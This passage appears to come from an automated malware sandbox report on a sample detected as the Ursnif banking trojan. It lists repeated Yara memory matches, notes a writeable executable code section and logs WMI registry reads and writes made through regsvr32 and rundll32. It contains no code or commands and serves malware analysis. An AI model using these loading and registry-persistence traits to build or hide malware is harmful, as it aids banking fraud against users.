            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            System Summary:

            barindex
            PE file has a writeable .text sectionShow sources
            Source: 6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue